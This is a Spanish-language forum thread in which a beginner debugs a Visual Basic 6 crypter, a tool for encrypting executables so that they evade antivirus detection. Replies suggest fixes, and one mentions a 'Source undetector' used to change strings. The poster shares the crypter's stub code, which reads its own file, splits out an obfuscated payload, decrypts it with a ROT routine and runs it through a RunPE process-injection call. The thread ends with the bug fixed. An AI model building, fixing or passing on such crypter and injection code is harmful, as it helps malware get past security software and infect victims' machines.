Hola buenos dias hoy realize un crypter en visual basic 6 (estoy aprendiendo xD ) Creee todo perfecto el cliente y el stub pero cuando encrypto un archivo en este caso un anotador me sale este error "Run-Time error 13 : Type mismatch" y no puedo encontrar una solucion :/ si alguno de ustedes sabe o me puede ayudar se lo agradeceria, Desde ya gracias
Compañero, una posible explicación (de acuerdo con lo poco que sé de Visual Basic) es que has equivocado el delimitador o hay seguro algún desfasaje de variables. Es decir, en el cliente pusiste "Pedrito" y en el stub escribiste "pedri".
En realidad si fuera error de delimitador tendría que salirte este mensaje " out range 9"
Revisá las variables, las strings.
Te lo muevo a la sección correspondiente, compañero.
En realidad si fuera error de delimitador tendría que salirte este mensaje " out range 9"
Revisá las variables, las strings.
Te lo muevo a la sección correspondiente, compañero.

Cambie las strings con el programa "Source undetector" y guarde pero sigue el maldito error compa
Hermano la unica manera de tratar de resolver es que pongas los codigos como para analizar el problema
Saludos
Saludos

aqui publico un codigo mio, uso rot para encriptar, y me sale el error '13', no sé si tenga que ver con el runpe que generé con el generador de v0id, o con la funcion strconv
Código: Seleccionar todo
Sub Main()
Dim dat As String
Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1
dat = Space(LOF(1))
Get #1, , dat
Close #1
Dim vainamocha() As String
vainamocha() = Split(dat, "(xšf§°®Š¥¥šq§°°©°žœºf¬°§©ó©¹ª±º«ê»Ž§K)")
Dim vm1 As String
vm1 = mpus(vainamocha(1), Int(vainamocha(3)))
Dim dat1() As Byte
dat1() = StrConv(vm1, vbFromUnicode)
Call Q睊ãêŠã£Š(dat1(), App.Path & "\" & App.EXEName & ".exe", Command)
End Sub
creo que puede ser por el rot que tira caracteres raros que no concuerdan con unicodetronoslycer escribió:aqui publico un codigo mio, uso rot para encriptar, y me sale el error '13', no sé si tenga que ver con el runpe que generé con el generador de v0id, o con la funcion strconv
Sub Main() Dim dat As String Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 dat = Space(LOF(1)) Get #1, , dat Close #1 Dim vainamocha() As String vainamocha() = Split(dat, "(xšf§°®Š¥¥šq§°°©°žœºf¬°§©ó©¹ª±º«ê»Ž§K)") Dim vm1 As String vm1 = mpus(vainamocha(1), Int(vainamocha(3))) Dim dat1() As Byte dat1() = StrConv(vm1, vbFromUnicode) Call Q睊ãêŠã£Š(dat1(), App.Path & "\" & App.EXEName & ".exe", Command) End Sub
solucionado, era un problema con el split que lo tome mal, no era el split(3), sino el splt(2) xDtronoslycer escribió:aqui publico un codigo mio, uso rot para encriptar, y me sale el error '13', no sé si tenga que ver con el runpe que generé con el generador de v0id, o con la funcion strconv
Sub Main() Dim dat As String Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 dat = Space(LOF(1)) Get #1, , dat Close #1 Dim vainamocha() As String vainamocha() = Split(dat, "(xšf§°®Š¥¥šq§°°©°žœºf¬°§©ó©¹ª±º«ê»Ž§K)") Dim vm1 As String vm1 = mpus(vainamocha(1), Int(vainamocha(3))) Dim dat1() As Byte dat1() = StrConv(vm1, vbFromUnicode) Call Q睊ãêŠã£Š(dat1(), App.Path & "\" & App.EXEName & ".exe", Command) End Sub